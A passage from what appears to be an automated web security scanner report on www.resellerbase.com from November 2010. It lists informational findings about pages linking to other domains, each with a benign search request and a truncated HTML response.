Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.86. http://www.resellerbase.com/communication/mobile-content/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/mobile-content/search.php

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /communication/mobile-content/search.php?cat=16&keyword=search...&Submit3=Search&opt=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/mobile-content/
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:37:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 20840

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by categories
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.mediaplazza.com/sysMaster.php?a=movil24" name="link_29"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.mediaplazza.com/sysMaster.php?a=movil24" name="link_29"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.87. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/rating/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/mobile-content/themes/kosmos/images/rating/search.php

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /communication/mobile-content/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:37:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.88. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/review/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/mobile-content/themes/kosmos/images/review/search.php

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /communication/mobile-content/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:37:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.89. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/mobile-content/themes/kosmos/images/search.php

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /communication/mobile-content/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:37:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.90. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/mobile-content/themes/kosmos/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /communication/mobile-content/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/mobile-content/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:37:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.91. http://www.resellerbase.com/communication/mobile-content/themes/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/mobile-content/themes/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /communication/mobile-content/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/mobile-content/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:37:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.92. http://www.resellerbase.com/communication/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /communication/search.php?cat=8&keyword=search...&Submit3=Search&opt=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:39:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 29778

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by categories
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.telebay.com/0815" name="link_10"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.telebay.com/0815" name="link_10"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://worldkom.net/reseller" name="link_16"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://worldkom.net/reseller" name="link_16"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.mediaplazza.com/sysMaster.php?a=movil24" name="link_29"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.mediaplazza.com/sysMaster.php?a=movil24" name="link_29"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.93. http://www.resellerbase.com/communication/themes/kosmos/images/rating/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/themes/kosmos/images/rating/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /communication/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:39:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.94. http://www.resellerbase.com/communication/themes/kosmos/images/review/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/themes/kosmos/images/review/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /communication/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:39:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.95. http://www.resellerbase.com/communication/themes/kosmos/images/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/themes/kosmos/images/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /communication/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:39:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.96. http://www.resellerbase.com/communication/themes/kosmos/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/themes/kosmos/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /communication/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:39:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.97. http://www.resellerbase.com/communication/themes/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/themes/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /communication/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:39:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.98. http://www.resellerbase.com/detail.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /detail.php?id=555-555-0199@example.com HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/get_rated.php?id=555-555-0199@example.com&pflag=view&submit=Submit
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:11:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.99. http://www.resellerbase.com/detail/10/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/10/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /detail/10/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/10/telebay-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:02:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.100. http://www.resellerbase.com/detail/10/themes/kosmos/images/rating/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/10/themes/kosmos/images/rating/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /detail/10/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/10/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:02:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.101. http://www.resellerbase.com/detail/10/themes/kosmos/images/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/10/themes/kosmos/images/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /detail/10/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/10/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:02:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.102. http://www.resellerbase.com/detail/10/themes/kosmos/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/10/themes/kosmos/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /detail/10/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/10/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:02:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.103. http://www.resellerbase.com/detail/10/themes/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/10/themes/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /detail/10/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/10/themes/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:02:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
